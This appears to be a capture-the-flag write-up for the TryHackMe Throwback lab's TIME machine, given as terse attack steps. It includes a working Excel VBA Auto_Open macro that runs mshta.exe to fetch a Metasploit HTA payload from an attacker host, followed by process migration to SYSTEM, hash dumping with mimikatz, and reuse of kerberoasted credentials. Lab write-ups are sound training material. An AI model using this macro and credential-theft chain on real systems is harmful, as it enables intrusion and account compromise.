2.8 KiB
TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
So we can access the web page
Going back to MAIL machine to get reset link by logging in as MurhphyF
murphyf PASSWORD
Now we need to update our /etc/hosts file
We updated the password through the reset link and can login with those
Create a microsoft execl macro document having this macro in it using metasploit hta server
Sub HelloWorld()
PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
Where that .hta is generated through metasploit
Upload that document
You will get a shell
By typing sysinfo
We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command ps to check currently running processes
Here we need to identify the process which is running as NT AUTHORITY\SYSTEM also running as a 64 bit
So we see this statisfying our requirements
And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
We can now run commands like mimikatz , hashdump
We have successfully dumped the hashes of the accounts on this machine
Using proxychains we ssh with Timekeeper's credentials
Switch to directory where mysql.exe is
Using the password from the kerberoasted mysql service account
Save the list of usernames you found from domain_users database
We can utilize the same list of passwords we used to get access to Throwbacks mail
